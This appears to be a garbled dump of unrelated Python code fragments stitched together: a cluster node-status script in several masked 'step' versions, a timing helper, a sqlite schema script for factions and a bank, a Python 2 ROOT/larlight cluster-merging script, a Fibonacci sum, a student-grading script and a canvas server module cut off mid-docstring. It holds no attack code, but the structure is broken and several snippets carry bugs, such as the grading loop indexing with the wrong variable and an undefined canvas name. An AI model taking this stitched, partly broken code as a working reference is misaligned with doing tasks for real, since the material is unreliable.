"step-1": "<mask token>\n\n\ndef main():\n \"\"\" Execute main program\n \"\"\"\n import argparse\n parser = argparse.ArgumentParser(description='Check nodes status.')\n parser.add_argument('-o', '--show-job-owners', action='store_true',\n help='List jobs running on nodes')\n parser.add_argument('-s', '--filter-states', help=\n 'Display only nodes in FILTER_STATES (comma separated).')\n args = parser.parse_args()\n check_status(args)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef check_status(args):\n \"\"\" Print node details\n\n :param args: Arguments from argparse\n :type args: argparse.Namespace\n \"\"\"\n cluster = Cluster(jobs_qstat=True, nodes=True, link=True)\n nodes = []\n if args.filter_states:\n cluster.filter_node_states(set(args.filter_states.lower().split(',')))\n for node in cluster.nodes:\n nodes.append([node.name, node.states, node.load, '%3d/%3d (%3d%%)' %\n (node.cpu_res, node.cpu_all, 1.0 * node.cpu_res / node.cpu_all *\n 100.0) if node.cpu_all else 'N/A', '%5.1f/%5.1fG (%3d%%)' % (\n node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.0\n ) if node.mem_all else 'N/A', ''.join('*' * node.cpu_res + '-' *\n (node.cpu_all - node.cpu_res))])\n if args.show_job_owners:\n nodes[-1][-1] = ''\n empty = [''] * 5\n users = defaultdict(list)\n for job in node.jobs_qstat:\n users[job.user].append(job)\n for orphan in node.orphans:\n users['ORPHANS'].append(orphan)\n for idx, uitem in enumerate(users.items()):\n u, jobs = uitem\n column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in\n jobs]))\n if idx:\n nodes.append(empty + [column_data])\n else:\n nodes[-1][-1] = column_data\n print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory',\n 'Jobs'], nodes)\n\n\ndef main():\n \"\"\" Execute main program\n \"\"\"\n import argparse\n parser = argparse.ArgumentParser(description='Check nodes status.')\n parser.add_argument('-o', '--show-job-owners', action='store_true',\n help='List jobs running on nodes')\n parser.add_argument('-s', '--filter-states', help=\n 'Display only nodes in FILTER_STATES (comma separated).')\n args = parser.parse_args()\n check_status(args)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef check_status(args):\n \"\"\" Print node details\n\n :param args: Arguments from argparse\n :type args: argparse.Namespace\n \"\"\"\n cluster = Cluster(jobs_qstat=True, nodes=True, link=True)\n nodes = []\n if args.filter_states:\n cluster.filter_node_states(set(args.filter_states.lower().split(',')))\n for node in cluster.nodes:\n nodes.append([node.name, node.states, node.load, '%3d/%3d (%3d%%)' %\n (node.cpu_res, node.cpu_all, 1.0 * node.cpu_res / node.cpu_all *\n 100.0) if node.cpu_all else 'N/A', '%5.1f/%5.1fG (%3d%%)' % (\n node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.0\n ) if node.mem_all else 'N/A', ''.join('*' * node.cpu_res + '-' *\n (node.cpu_all - node.cpu_res))])\n if args.show_job_owners:\n nodes[-1][-1] = ''\n empty = [''] * 5\n users = defaultdict(list)\n for job in node.jobs_qstat:\n users[job.user].append(job)\n for orphan in node.orphans:\n users['ORPHANS'].append(orphan)\n for idx, uitem in enumerate(users.items()):\n u, jobs = uitem\n column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in\n jobs]))\n if idx:\n nodes.append(empty + [column_data])\n else:\n nodes[-1][-1] = column_data\n print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory',\n 'Jobs'], nodes)\n\n\ndef main():\n \"\"\" Execute main program\n \"\"\"\n import argparse\n parser = argparse.ArgumentParser(description='Check nodes status.')\n parser.add_argument('-o', '--show-job-owners', action='store_true',\n help='List jobs running on nodes')\n parser.add_argument('-s', '--filter-states', help=\n 'Display only nodes in FILTER_STATES (comma separated).')\n args = parser.parse_args()\n check_status(args)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from collections import defaultdict\nfrom cluster.common import Cluster\nfrom cluster.tools import print_table\n\n\ndef check_status(args):\n \"\"\" Print node details\n\n :param args: Arguments from argparse\n :type args: argparse.Namespace\n \"\"\"\n cluster = Cluster(jobs_qstat=True, nodes=True, link=True)\n nodes = []\n if args.filter_states:\n cluster.filter_node_states(set(args.filter_states.lower().split(',')))\n for node in cluster.nodes:\n nodes.append([node.name, node.states, node.load, '%3d/%3d (%3d%%)' %\n (node.cpu_res, node.cpu_all, 1.0 * node.cpu_res / node.cpu_all *\n 100.0) if node.cpu_all else 'N/A', '%5.1f/%5.1fG (%3d%%)' % (\n node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.0\n ) if node.mem_all else 'N/A', ''.join('*' * node.cpu_res + '-' *\n (node.cpu_all - node.cpu_res))])\n if args.show_job_owners:\n nodes[-1][-1] = ''\n empty = [''] * 5\n users = defaultdict(list)\n for job in node.jobs_qstat:\n users[job.user].append(job)\n for orphan in node.orphans:\n users['ORPHANS'].append(orphan)\n for idx, uitem in enumerate(users.items()):\n u, jobs = uitem\n column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in\n jobs]))\n if idx:\n nodes.append(empty + [column_data])\n else:\n nodes[-1][-1] = column_data\n print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory',\n 'Jobs'], nodes)\n\n\ndef main():\n \"\"\" Execute main program\n \"\"\"\n import argparse\n parser = argparse.ArgumentParser(description='Check nodes status.')\n parser.add_argument('-o', '--show-job-owners', action='store_true',\n help='List jobs running on nodes')\n parser.add_argument('-s', '--filter-states', help=\n 'Display only nodes in FILTER_STATES (comma separated).')\n args = parser.parse_args()\n check_status(args)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python\nfrom collections import defaultdict\n\nfrom cluster.common import Cluster\nfrom cluster.tools import print_table\n\n\ndef check_status(args):\n \"\"\" Print node details\n\n :param args: Arguments from argparse\n :type args: argparse.Namespace\n \"\"\"\n cluster = Cluster(jobs_qstat=True, nodes=True, link=True)\n nodes = []\n\n if args.filter_states:\n cluster.filter_node_states(set(args.filter_states.lower().split(',')))\n\n for node in cluster.nodes:\n nodes.append([\n node.name,\n node.states,\n node.load,\n \"%3d/%3d (%3d%%)\" % (\n node.cpu_res, node.cpu_all, 1. * node.cpu_res / node.cpu_all * 100.) if node.cpu_all else 'N/A', # Cores\n \"%5.1f/%5.1fG (%3d%%)\" % (\n node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.) if node.mem_all else 'N/A', # Memory\n ''.join(('*' * node.cpu_res) + ('-' * (node.cpu_all - node.cpu_res)))\n ])\n\n if args.show_job_owners:\n nodes[-1][-1] = ''\n empty = [''] * 5\n\n users = defaultdict(list)\n for job in node.jobs_qstat:\n users[job.user].append(job)\n for orphan in node.orphans:\n users['ORPHANS'].append(orphan)\n\n for idx, uitem in enumerate(users.items()):\n u, jobs = uitem\n column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in jobs]))\n\n if idx:\n nodes.append(empty + [column_data])\n else:\n nodes[-1][-1] = column_data\n\n # Printing bits\n print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory', 'Jobs'], nodes)\n\n\ndef main():\n \"\"\" Execute main program\n \"\"\"\n # noinspection PyCompatibility\n import argparse\n parser = argparse.ArgumentParser(description='Check nodes status.')\n parser.add_argument('-o', '--show-job-owners', action='store_true', help='List jobs running on nodes')\n parser.add_argument('-s', '--filter-states', help='Display only nodes in FILTER_STATES (comma separated).')\n args = parser.parse_args()\n\n check_status(args)\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import time
# Returns time in seconds for func(arg) to run
def time_func(func, arg):
start = time.time()
func(arg)
return time.time() - start
|
normal
|
{
"blob_id": "7f406c1cd4d56da3a7d5f8739e0b65b0e61cf637",
"index": 5290,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef time_func(func, arg):\n start = time.time()\n func(arg)\n return time.time() - start\n",
"step-3": "import time\n\n\ndef time_func(func, arg):\n start = time.time()\n func(arg)\n return time.time() - start\n",
"step-4": "import time\n\n# Returns time in seconds for func(arg) to run\ndef time_func(func, arg):\n start = time.time()\n func(arg)\n return time.time() - start\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from .gsclient import GSClient
from .gspath import GSPath
__all__ = [
"GSClient",
"GSPath",
]
|
normal
|
{
"blob_id": "7b726dd8ebbd5c49f9ce5bddb4779fcfbaaeb479",
"index": 5651,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n__all__ = ['GSClient', 'GSPath']\n",
"step-3": "from .gsclient import GSClient\nfrom .gspath import GSPath\n__all__ = ['GSClient', 'GSPath']\n",
"step-4": "from .gsclient import GSClient\nfrom .gspath import GSPath\n\n__all__ = [\n \"GSClient\",\n \"GSPath\",\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if __name__ == '__main__':
conn = sqlite3.connect('donations.sqlite')
c = conn.cursor()
query = 'DROP TABLE IF EXISTS factions;'
c.execute(query)
query = 'DROP TABLE IF EXISTS members;'
c.execute(query)
query = 'DROP TABLE IF EXISTS bank;'
c.execute(query)
conn.commit()
query = """CREATE TABLE factions(
id INTEGER PRIMARY KEY,
faction INTEGER UNIQUE,
faction_name TEXT);"""
c.execute(query)
conn.commit()
query = """CREATE TABLE members(
id INTEGER PRIMARY KEY,
member INTEGER UNIQUE,
member_name TEXT,
faction INTEGER,
FOREIGN KEY(faction) REFERENCES factions(faction));"""
c.execute(query)
conn.commit()
query = """CREATE TABLE bank(
id INTEGER PRIMARY KEY,
stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
member INTEGER UNIQUE,
money_balance INTEGER,
point_balance INTEGER,
FOREIGN KEY (member) REFERENCES members(member));"""
c.execute(query)
conn.commit()
<|reserved_special_token_1|>
import sqlite3
if __name__ == '__main__':
conn = sqlite3.connect('donations.sqlite')
c = conn.cursor()
query = 'DROP TABLE IF EXISTS factions;'
c.execute(query)
query = 'DROP TABLE IF EXISTS members;'
c.execute(query)
query = 'DROP TABLE IF EXISTS bank;'
c.execute(query)
conn.commit()
query = """CREATE TABLE factions(
id INTEGER PRIMARY KEY,
faction INTEGER UNIQUE,
faction_name TEXT);"""
c.execute(query)
conn.commit()
query = """CREATE TABLE members(
id INTEGER PRIMARY KEY,
member INTEGER UNIQUE,
member_name TEXT,
faction INTEGER,
FOREIGN KEY(faction) REFERENCES factions(faction));"""
c.execute(query)
conn.commit()
query = """CREATE TABLE bank(
id INTEGER PRIMARY KEY,
stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
member INTEGER UNIQUE,
money_balance INTEGER,
point_balance INTEGER,
FOREIGN KEY (member) REFERENCES members(member));"""
c.execute(query)
conn.commit()
<|reserved_special_token_1|>
import sqlite3
if __name__ == '__main__':
conn = sqlite3.connect('donations.sqlite')
c = conn.cursor()
query = """DROP TABLE IF EXISTS factions;"""
c.execute(query)
query = """DROP TABLE IF EXISTS members;"""
c.execute(query)
query = """DROP TABLE IF EXISTS bank;"""
c.execute(query)
conn.commit()
query = """CREATE TABLE factions(
id INTEGER PRIMARY KEY,
faction INTEGER UNIQUE,
faction_name TEXT);"""
c.execute(query)
conn.commit()
query = """CREATE TABLE members(
id INTEGER PRIMARY KEY,
member INTEGER UNIQUE,
member_name TEXT,
faction INTEGER,
FOREIGN KEY(faction) REFERENCES factions(faction));"""
c.execute(query)
conn.commit()
query = """CREATE TABLE bank(
id INTEGER PRIMARY KEY,
stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
member INTEGER UNIQUE,
money_balance INTEGER,
point_balance INTEGER,
FOREIGN KEY (member) REFERENCES members(member));"""
c.execute(query)
conn.commit()
|
flexible
|
{
"blob_id": "b6b8dfaa9644fa4f4c250358b89f4a30c26c317f",
"index": 4788,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n conn = sqlite3.connect('donations.sqlite')\n c = conn.cursor()\n query = 'DROP TABLE IF EXISTS factions;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS members;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS bank;'\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE factions(\n id INTEGER PRIMARY KEY,\n faction INTEGER UNIQUE,\n faction_name TEXT);\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE members(\n id INTEGER PRIMARY KEY,\n member INTEGER UNIQUE,\n member_name TEXT,\n faction INTEGER,\n FOREIGN KEY(faction) REFERENCES factions(faction));\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE bank(\n id INTEGER PRIMARY KEY,\n stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,\n member INTEGER UNIQUE,\n money_balance INTEGER,\n point_balance INTEGER,\n FOREIGN KEY (member) REFERENCES members(member));\"\"\"\n c.execute(query)\n conn.commit()\n",
"step-3": "import sqlite3\nif __name__ == '__main__':\n conn = sqlite3.connect('donations.sqlite')\n c = conn.cursor()\n query = 'DROP TABLE IF EXISTS factions;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS members;'\n c.execute(query)\n query = 'DROP TABLE IF EXISTS bank;'\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE factions(\n id INTEGER PRIMARY KEY,\n faction INTEGER UNIQUE,\n faction_name TEXT);\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE members(\n id INTEGER PRIMARY KEY,\n member INTEGER UNIQUE,\n member_name TEXT,\n faction INTEGER,\n FOREIGN KEY(faction) REFERENCES factions(faction));\"\"\"\n c.execute(query)\n conn.commit()\n query = \"\"\"CREATE TABLE bank(\n id INTEGER PRIMARY KEY,\n stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,\n member INTEGER UNIQUE,\n money_balance INTEGER,\n point_balance INTEGER,\n FOREIGN KEY (member) REFERENCES members(member));\"\"\"\n c.execute(query)\n conn.commit()\n",
"step-4": "import sqlite3\n\n\nif __name__ == '__main__':\n conn = sqlite3.connect('donations.sqlite')\n c = conn.cursor()\n\n query = \"\"\"DROP TABLE IF EXISTS factions;\"\"\"\n c.execute(query)\n query = \"\"\"DROP TABLE IF EXISTS members;\"\"\"\n c.execute(query)\n query = \"\"\"DROP TABLE IF EXISTS bank;\"\"\"\n c.execute(query)\n conn.commit()\n\n query = \"\"\"CREATE TABLE factions(\n id INTEGER PRIMARY KEY,\n faction INTEGER UNIQUE,\n faction_name TEXT);\"\"\"\n\n c.execute(query)\n conn.commit()\n\n query = \"\"\"CREATE TABLE members(\n id INTEGER PRIMARY KEY,\n member INTEGER UNIQUE,\n member_name TEXT,\n faction INTEGER,\n FOREIGN KEY(faction) REFERENCES factions(faction));\"\"\"\n c.execute(query)\n conn.commit()\n\n query = \"\"\"CREATE TABLE bank(\n id INTEGER PRIMARY KEY,\n stored_timestamp TEXT DEFAULT CURRENT_TIMESTAMP,\n member INTEGER UNIQUE,\n money_balance INTEGER,\n point_balance INTEGER,\n FOREIGN KEY (member) REFERENCES members(member));\"\"\"\n c.execute(query)\n conn.commit()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from ROOT import *
gSystem.Load("libAnalysis")
import sys
import argparse
parser = argparse.ArgumentParser(description="Python script to process and merge showers.")
group = parser.add_mutually_exclusive_group()
group.add_argument("-v", "--verbose", help="Turn on verbose output",
action="store_true")
group.add_argument("-q", "--quiet", help="Turn off most output",
action="store_true")
parser.add_argument("-s","--source",help="Name of input file")
parser.add_argument("-o","--data-output",help="Output data file, if event is changed")
parser.add_argument("-a","--ana-output",help="Analysis output file")
parser.add_argument("-n", "--num-events",help="Number of events to process")
parser.add_argument("-d","--display",help="Turn on the display to see each view before and after." )
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
if args.verbose:
print "Verbose mode turned on."
if args.source != None:
print "\tSource file is " + args.source
if args.data_output != None:
print "\tData output file is " + args.data_output
if args.ana_output != None:
print "\tAna output file is " + args.ana_output
if args.source == None:
print "Error: please specificy an input file with -s or --source."
quit()
if args.data_output == None:
args.data_output = "default_event_output.root"
print "No event output file selected. If necessary, output will go to:"
print "\t"+args.data_output
if args.ana_output == None:
args.ana_output = "default_ana_output.root"
print "No ana output file selected. If necessary, output will go to:"
print "\t"+args.ana_output
ana_proc = larlight.ana_processor()
if args.verbose:
ana_proc.set_verbosity(larlight.MSG.DEBUG)
# Not sure what this does
ana_proc.set_io_mode(larlight.storage_manager.BOTH)
# Add the input file. Not sure if the above takes multiple input files yet
ana_proc.add_input_file(args.source)
# ?
larlight.storage_manager.get().set_in_rootdir("scanner")
# set output file
ana_proc.set_output_file(args.data_output)
# Set destination for ana stuff
ana_proc.set_ana_output_file(args.ana_output)
my_merge_alg = larlight.ClusterMergeAlg()
my_merger = larlight.ClusterMerge()
my_merger.set_mergealg(my_merge_alg)
ana_proc.add_process(my_merge_alg)
ana_proc.add_process(my_merger)
c=TCanvas("c","Wire v. Time Cluster Viewer",900,600)
while ana_proc.process_event() and ana_proc.get_process_status() == ana_proc.PROCESSING:
currentview = 0;
print my_merge_alg.GetMergeTree()
for iview in xrange(0,3):
for iclus in xrange(ana_proc.GetClusterGraph_Reco(int(iview),bool(true)).size()):
gstart=ana_proc.GetClusterGraph_Reco(int(iview),bool(true)).at(iclus)
gend =ana_proc.GetClusterGraph_Reco(int(iview),bool(false)).at(iclus)
xmin=ana_proc.GetHisto_Hits(int(iview)).GetXaxis().GetXmin()
xmax=ana_proc.GetHisto_Hits(int(iview)).GetXaxis().GetXmax()
ymin=ana_proc.GetHisto_Hits(int(iview)).GetYaxis().GetXmin()
ymax=ana_proc.GetHisto_Hits(int(iview)).GetYaxis().GetXmax()
gstart.GetXaxis().SetLimits(xmin,xmax)
gend.GetXaxis().SetLimits(xmin,xmax)
gstart.GetYaxis().SetRangeUser(ymin,ymax)
gend.GetYaxis().SetRangeUser(ymin,ymax)
gstart.SetTitle("View: %d, Cluster: %d"%(iview+1,iclus))
gstart.SetMarkerSize(3)
gstart.SetMarkerStyle(30)
gend.SetMarkerSize(3)
gend.SetMarkerStyle(29)
gstart.Draw("ALP")
gend.Draw("LP")
ana_proc.GetHisto_Reco(int(iview)).at(iclus).Draw("same")
leg = TLegend(0.6,0.65,0.88,0.85)
leg.AddEntry(gstart,"Start Point","p")
leg.AddEntry(gend,"End Point","p")
leg.Draw()
c_graph.Update()
print "Drawing cluster %d out of %d for view %d. To look at the next cluster hit enter." % (iclus,ana_proc.GetClusterGraph_Reco(int(iview),bool(true)).size()-1,iview+1)
sys.stdin.readline()
print "Hit Enter to continue to next evt..."
sys.stdin.readline()
#ana_proc.run()
|
normal
|
{
"blob_id": "d57b91bf41f031e3362dabdef8c67a0da04fe577",
"index": 7540,
"step-1": "from ROOT import *\ngSystem.Load(\"libAnalysis\")\nimport sys\n\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Python script to process and merge showers.\")\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument(\"-v\", \"--verbose\", help=\"Turn on verbose output\",\n action=\"store_true\")\ngroup.add_argument(\"-q\", \"--quiet\", help=\"Turn off most output\",\n action=\"store_true\")\nparser.add_argument(\"-s\",\"--source\",help=\"Name of input file\")\nparser.add_argument(\"-o\",\"--data-output\",help=\"Output data file, if event is changed\")\nparser.add_argument(\"-a\",\"--ana-output\",help=\"Analysis output file\")\nparser.add_argument(\"-n\", \"--num-events\",help=\"Number of events to process\")\nparser.add_argument(\"-d\",\"--display\",help=\"Turn on the display to see each view before and after.\" )\nargs = parser.parse_args()\n\nif len(sys.argv) == 1:\n parser.print_help()\n\nif args.verbose:\n print \"Verbose mode turned on.\"\n if args.source != None:\n print \"\\tSource file is \" + args.source\n if args.data_output != None:\n print \"\\tData output file is \" + args.data_output\n if args.ana_output != None:\n print \"\\tAna output file is \" + args.ana_output\n\nif args.source == None:\n print \"Error: please specificy an input file with -s or --source.\"\n quit()\n\nif args.data_output == None:\n args.data_output = \"default_event_output.root\"\n print \"No event output file selected. If necessary, output will go to:\"\n print \"\\t\"+args.data_output\n\nif args.ana_output == None:\n args.ana_output = \"default_ana_output.root\"\n print \"No ana output file selected. If necessary, output will go to:\"\n print \"\\t\"+args.ana_output\n\n\nana_proc = larlight.ana_processor()\n\nif args.verbose:\n ana_proc.set_verbosity(larlight.MSG.DEBUG)\n\n# Not sure what this does\nana_proc.set_io_mode(larlight.storage_manager.BOTH)\n\n# Add the input file. Not sure if the above takes multiple input files yet\nana_proc.add_input_file(args.source)\n\n# ?\nlarlight.storage_manager.get().set_in_rootdir(\"scanner\")\n\n# set output file\nana_proc.set_output_file(args.data_output)\n\n# Set destination for ana stuff\nana_proc.set_ana_output_file(args.ana_output)\n\nmy_merge_alg = larlight.ClusterMergeAlg()\nmy_merger = larlight.ClusterMerge()\n\nmy_merger.set_mergealg(my_merge_alg)\n\nana_proc.add_process(my_merge_alg)\n\nana_proc.add_process(my_merger)\n\nc=TCanvas(\"c\",\"Wire v. Time Cluster Viewer\",900,600)\n\n\n\nwhile ana_proc.process_event() and ana_proc.get_process_status() == ana_proc.PROCESSING:\n currentview = 0;\n print my_merge_alg.GetMergeTree()\n for iview in xrange(0,3):\n for iclus in xrange(ana_proc.GetClusterGraph_Reco(int(iview),bool(true)).size()):\n gstart=ana_proc.GetClusterGraph_Reco(int(iview),bool(true)).at(iclus)\n gend =ana_proc.GetClusterGraph_Reco(int(iview),bool(false)).at(iclus)\n xmin=ana_proc.GetHisto_Hits(int(iview)).GetXaxis().GetXmin()\n xmax=ana_proc.GetHisto_Hits(int(iview)).GetXaxis().GetXmax()\n ymin=ana_proc.GetHisto_Hits(int(iview)).GetYaxis().GetXmin()\n ymax=ana_proc.GetHisto_Hits(int(iview)).GetYaxis().GetXmax()\n gstart.GetXaxis().SetLimits(xmin,xmax)\n gend.GetXaxis().SetLimits(xmin,xmax) \n gstart.GetYaxis().SetRangeUser(ymin,ymax)\n gend.GetYaxis().SetRangeUser(ymin,ymax)\n gstart.SetTitle(\"View: %d, Cluster: %d\"%(iview+1,iclus))\n gstart.SetMarkerSize(3)\n gstart.SetMarkerStyle(30)\n gend.SetMarkerSize(3)\n gend.SetMarkerStyle(29)\n gstart.Draw(\"ALP\")\n gend.Draw(\"LP\")\n ana_proc.GetHisto_Reco(int(iview)).at(iclus).Draw(\"same\")\n leg = TLegend(0.6,0.65,0.88,0.85)\n leg.AddEntry(gstart,\"Start Point\",\"p\")\n leg.AddEntry(gend,\"End Point\",\"p\")\n leg.Draw()\n c_graph.Update()\n print \"Drawing cluster %d out of %d for view %d. To look at the next cluster hit enter.\" % (iclus,ana_proc.GetClusterGraph_Reco(int(iview),bool(true)).size()-1,iview+1)\n sys.stdin.readline()\n\n print \"Hit Enter to continue to next evt...\"\n sys.stdin.readline()\n\n#ana_proc.run()\n\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# coding: utf-8
# In[50]:
## Description
## Adds the Fibonacci numbers smaller than 4 million
## Weekly Journal
## When using while True, "break" MUST be used to avoid infinite loops
## Questions
## None
fib=[1,2]
counter=1
while True:
if fib[counter]>4000000:
flag=0
break
else:
fib.append(fib[counter]+fib[counter-1])
counter+=1
fib=fib[0:len(fib)-1]
total=sum(fib)
print(total)
|
normal
|
{
"blob_id": "e2572b48f7183353ba2aab0500130dc8a71a0b22",
"index": 5286,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n if fib[counter] > 4000000:\n flag = 0\n break\n else:\n fib.append(fib[counter] + fib[counter - 1])\n counter += 1\n<mask token>\nprint(total)\n",
"step-3": "fib = [1, 2]\ncounter = 1\nwhile True:\n if fib[counter] > 4000000:\n flag = 0\n break\n else:\n fib.append(fib[counter] + fib[counter - 1])\n counter += 1\nfib = fib[0:len(fib) - 1]\ntotal = sum(fib)\nprint(total)\n",
"step-4": "\n# coding: utf-8\n\n# In[50]:\n\n\n## Description\n## Adds the Fibonacci numbers smaller than 4 million\n\n## Weekly Journal\n## When using while True, \"break\" MUST be used to avoid infinite loops\n\n## Questions\n## None\n\nfib=[1,2]\ncounter=1\nwhile True:\n if fib[counter]>4000000:\n flag=0\n break\n else:\n fib.append(fib[counter]+fib[counter-1])\n counter+=1\nfib=fib[0:len(fib)-1]\ntotal=sum(fib)\nprint(total)\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print('bob' in adict)
print('name' in adict)
for key in adict:
print('%s:%s' % (key, adict[key]))
print('%(name)s:%(age)s' % adict)
<|reserved_special_token_1|>
adict = {'name': 'bob', 'age': 23}
print('bob' in adict)
print('name' in adict)
for key in adict:
print('%s:%s' % (key, adict[key]))
print('%(name)s:%(age)s' % adict)
|
flexible
|
{
"blob_id": "aa4d872c6a529d8acf18f1c3b477bc1816ac2887",
"index": 575,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('bob' in adict)\nprint('name' in adict)\nfor key in adict:\n print('%s:%s' % (key, adict[key]))\nprint('%(name)s:%(age)s' % adict)\n",
"step-3": "adict = {'name': 'bob', 'age': 23}\nprint('bob' in adict)\nprint('name' in adict)\nfor key in adict:\n print('%s:%s' % (key, adict[key]))\nprint('%(name)s:%(age)s' % adict)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
print("calificacion de los alumnos")
lista2_calificaciones=[]
for i in range (0,5):
lista2_calificaciones.append(int(input(f"ingrese la calificacion corresponfiente al alumno")))
print(lista2_calificaciones)
for n in range(0,len(lista2_calificaciones)):
if lista2_calificaciones[i] >=0 and lista2_calificaciones[i]<=5:
print("valor insuficiente, repetir el curso")
else:
if lista2_calificaciones[i] >5 and lista2_calificaciones[i]<=7:
print("Valor es aprobatorio")
else:
if lista2_calificaciones[i]>7 and lista2_calificaciones[i]<9:
print("valor es notable")
else:
if lista2_calificaciones[i] ==9 and lista2_calificaciones[i]==10:
print("el valor es notable")
else:
print("Valor muy alto vuelvalo a intentar")
|
normal
|
{
"blob_id": "1cc9c89182f69a5f1eb9a0e7f3433dc30c8d7035",
"index": 2938,
"step-1": "<mask token>\n",
"step-2": "print('calificacion de los alumnos')\n<mask token>\nfor i in range(0, 5):\n lista2_calificaciones.append(int(input(\n f'ingrese la calificacion corresponfiente al alumno')))\n print(lista2_calificaciones)\nfor n in range(0, len(lista2_calificaciones)):\n if lista2_calificaciones[i] >= 0 and lista2_calificaciones[i] <= 5:\n print('valor insuficiente, repetir el curso')\n elif lista2_calificaciones[i] > 5 and lista2_calificaciones[i] <= 7:\n print('Valor es aprobatorio')\n elif lista2_calificaciones[i] > 7 and lista2_calificaciones[i] < 9:\n print('valor es notable')\n elif lista2_calificaciones[i] == 9 and lista2_calificaciones[i] == 10:\n print('el valor es notable')\n else:\n print('Valor muy alto vuelvalo a intentar')\n",
"step-3": "print('calificacion de los alumnos')\nlista2_calificaciones = []\nfor i in range(0, 5):\n lista2_calificaciones.append(int(input(\n f'ingrese la calificacion corresponfiente al alumno')))\n print(lista2_calificaciones)\nfor n in range(0, len(lista2_calificaciones)):\n if lista2_calificaciones[i] >= 0 and lista2_calificaciones[i] <= 5:\n print('valor insuficiente, repetir el curso')\n elif lista2_calificaciones[i] > 5 and lista2_calificaciones[i] <= 7:\n print('Valor es aprobatorio')\n elif lista2_calificaciones[i] > 7 and lista2_calificaciones[i] < 9:\n print('valor es notable')\n elif lista2_calificaciones[i] == 9 and lista2_calificaciones[i] == 10:\n print('el valor es notable')\n else:\n print('Valor muy alto vuelvalo a intentar')\n",
"step-4": "\n\nprint(\"calificacion de los alumnos\")\n\nlista2_calificaciones=[]\nfor i in range (0,5):\n lista2_calificaciones.append(int(input(f\"ingrese la calificacion corresponfiente al alumno\")))\n print(lista2_calificaciones)\n\nfor n in range(0,len(lista2_calificaciones)):\n if lista2_calificaciones[i] >=0 and lista2_calificaciones[i]<=5:\n print(\"valor insuficiente, repetir el curso\")\n else:\n if lista2_calificaciones[i] >5 and lista2_calificaciones[i]<=7:\n print(\"Valor es aprobatorio\")\n else:\n if lista2_calificaciones[i]>7 and lista2_calificaciones[i]<9:\n print(\"valor es notable\") \n else:\n if lista2_calificaciones[i] ==9 and lista2_calificaciones[i]==10:\n print(\"el valor es notable\")\n else:\n \n print(\"Valor muy alto vuelvalo a intentar\")\n \n \n \n\n ",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from .server import CanvasServer
try:
from .jupyter import JupyterCanvas, create_jupyter_canvas
HAS_JUPYTER = True
except:
HAS_JUPYTER = False
JupyterCanvas = None # type: ignore
def http_server(
file: str = None, host: str = "localhost", port: int = 5050
) -> CanvasServer:
"""Creates a new HTTP server for displaying the network, using WebSockets to
transmit data. The server will only start once its
:meth:`~server.CanvasServer.start` method is called. After the server has started,
the network can be viewed by opening a browser and navigating to the address
``http://localhost:5050/`` (change the port as necessary).
:file: (Optional) The path to the HTML file which the server should display,
relative to the current runtime directory. If unspecified, the default HTML file
will be used. When creating a custom HTML interface, use the default file as a
guide.
:type file: str
:port: (Optional) The port on which the server should start, defaulting to to 5050.
Note that the next port (by default 5051) will also be used to transmit data
through WebSockets.
:type port: int
"""
return CanvasServer(file, host, port)
def jupyter_canvas(buttons: bool = False) -> JupyterCanvas:
"""Creates a new :class:`~api.Canvas` which will dispatch and receive
events through a Jupyter widget, and which can be displayed using the IPython
``display`` function.
